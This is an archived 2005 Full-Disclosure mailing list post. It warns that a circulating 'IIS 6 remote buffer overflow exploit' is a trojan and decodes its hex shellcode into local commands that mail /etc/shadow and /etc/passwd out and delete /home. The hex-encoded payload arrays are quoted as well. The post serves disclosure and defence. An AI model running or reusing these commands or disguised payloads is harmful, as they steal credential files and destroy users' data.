| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <4C49470270F5AD43A0BDEA0F130C850B6A7B21@its-emb1.umflint.edu> Date: Tue Apr 19 02:15:54 2005 From: jlauro at umflint.edu (Lauro, John) Subject: IIS 6 Remote Buffer Overflow Exploit Not that anyone would fall for running this on anything besides a test system, but to save 30 second to decode, what it really does (locally, not remotely) is: cat /etc/shadow |mail full-disclosure@...ts.grok.org.uk cat /etc/passwd |mail full-disclosure@...ts.grok.org.uk /bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe -----Original Message----- */ char shellcode[] = "\x2f\x62\x69\x6e\x2f\x72\x6d\x20" "\x2d\x72\x66\x20\x2f\x68\x6f\x6d" "\x65\x2f\x2a\x3b\x63\x6c\x65\x61" "\x72\x3b\x65\x63\x68\x6f\x20\x62" "\x6c\x34\x63\x6b\x68\x34\x74\x2c" "\x68\x65\x68\x65"; char launcher [] = "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73" "\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69" "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69" "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40" "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b" "\x2e\x6f\x72\x67\x2e\x75\x6b\x20"; char netcat_shell [] = "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70" "\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69" "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69" "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40" "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b" "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
Powered by blists - more mailing lists